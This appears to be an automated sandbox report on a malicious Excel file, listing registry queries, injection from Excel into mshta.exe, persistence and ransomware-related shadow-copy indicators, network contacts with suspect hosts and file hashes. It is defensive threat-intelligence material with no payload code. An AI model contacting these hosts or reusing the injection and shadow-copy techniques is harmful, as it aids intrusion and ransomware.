Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4808 wrote to memory of 4192 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe
PID 4808 wrote to memory of 4192 N/A C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\544e3a275c258b90d8cda8be36b057e75451b4901d4663082db9f97419cd5a4a.xls"

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
GB 52.109.32.7:443 roaming.officeapps.live.com tcp
US 8.8.8.8:53 4t.gg udp
KR 221.146.204.133:443 4t.gg tcp
US 8.8.8.8:53 18.89.109.52.in-addr.arpa udp
US 8.8.8.8:53 20.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 r10.o.lencr.org udp
GB 88.221.135.113:80 r10.o.lencr.org tcp
US 8.8.8.8:53 7.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 133.204.146.221.in-addr.arpa udp
US 8.8.8.8:53 168.245.100.95.in-addr.arpa udp
US 8.8.8.8:53 113.135.221.88.in-addr.arpa udp
US 198.46.178.167:80 198.46.178.167 tcp
US 8.8.8.8:53 167.178.46.198.in-addr.arpa udp
US 8.8.8.8:53 26.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 24.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 20.49.80.91.in-addr.arpa udp
US 8.8.8.8:53 21.49.80.91.in-addr.arpa udp

Files

memory/4808-2-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp

memory/4808-1-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp

memory/4808-3-0x00007FFE6210D000-0x00007FFE6210E000-memory.dmp

memory/4808-0-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp

memory/4808-5-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-6-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-7-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp

memory/4808-11-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-15-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-16-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-17-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp

memory/4808-14-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-18-0x00007FFE1FA60000-0x00007FFE1FA70000-memory.dmp

memory/4808-13-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-12-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-10-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-20-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-19-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-9-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-8-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-4-0x00007FFE220F0000-0x00007FFE22100000-memory.dmp

memory/4192-40-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-43-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-44-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-45-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-46-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4808-48-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-52-0x00007FFE62070000-0x00007FFE62265000-memory.dmp

memory/4192-53-0x00007FF7A85C0000-0x00007FF7A85C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 9056d632bc247d00191d7d1218f28c4a
SHA1 0e5e49802533f1c8c57194b29d6755258ba04fef
SHA256 a66c800e76372ee169468a5794064a9249554ca721f5e88723f4444f003568fd
SHA512 42b0941b6d9574bd8fcf8a5ee8e6b97446d12bf41af22ac6cf6a65c6196383c5b2705eee13ec07b585cd96252d296fa2e7dcead54a6618458849b5278dd8c19f